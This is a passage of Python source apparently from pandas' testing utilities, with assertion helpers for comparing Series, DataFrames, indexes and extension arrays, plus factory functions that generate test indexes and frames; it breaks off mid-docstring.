__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}.values")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
    Check that two 'np.ndarray' objects are equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
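    Examples
    --------
    A minimal sketch:

    >>> import numpy as np
    >>> import pandas._testing as tm
    >>> tm.assert_numpy_array_equal(np.array([1, 2]), np.array([1, 2]))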
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
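    Examples
    --------
    A minimal sketch using a nullable integer array:

    >>> import pandas as pd
    >>> import pandas._testing as tm
    >>> a = pd.array([1, 2, pd.NA], dtype="Int64")
    >>> b = pd.array([1, 2, pd.NA], dtype="Int64")
    >>> tm.assert_extension_array_equal(a, b)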
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
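    Examples
    --------
    A minimal passing comparison:

    >>> import pandas as pd
    >>> import pandas._testing as tm
    >>> a = pd.Series([1, 2, 3, 4])
    >>> b = pd.Series([1, 2, 3, 4])
    >>> tm.assert_series_equal(a, b)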
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
        # TODO: there are some tests where the rhs is sparse and the lhs is
        # dense. Should use assert_class_equal in the future.
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj=str(obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
f"[datetimelike_compat=True] {left.values} "
f"is not equal to {right.values}."
)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
        Whether to just check the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
    Returns
    -------
    DataFrame with the following columns:
        * name : object dtype with string names
        * id : int dtype, Poisson-distributed around 1000
        * x, y : float dtype, uniform on [-1, 1)
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        # (guard against names being None before subscripting it)
        name = None if names is None else names[0]
        index = Index(tuples[0], name=name)
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
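# Illustrative usage (added for exposition, not part of the original module):
# a 2-level MultiIndex where each first-level label repeats twice, with the
# default "#"-prefixed level names.
def _example_make_custom_index():
    idx = makeCustomIndex(nentries=4, nlevels=2, names=True, ndupe_l=[2])
    assert isinstance(idx, MultiIndex)
    assert len(idx) == 4
    assert list(idx.names) == ["#0", "#1"]
    return idx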
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
    nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
        default names, or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels == 1.
    c_idx_nlevels - number of levels in the columns index. > 1 will yield a
        MultiIndex.
    r_idx_nlevels - number of levels in the rows index. > 1 will yield a
        MultiIndex.
    data_gen_f - a function f(row, col) which returns the data value at that
        position; the default generator yields values of the form "RxCy"
        based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
        of duplicates for each label at a given level of the corresponding
        index. The default `None` value produces a multiplicity of 1 across
        all levels, i.e. a unique index. Will accept a partial list of length
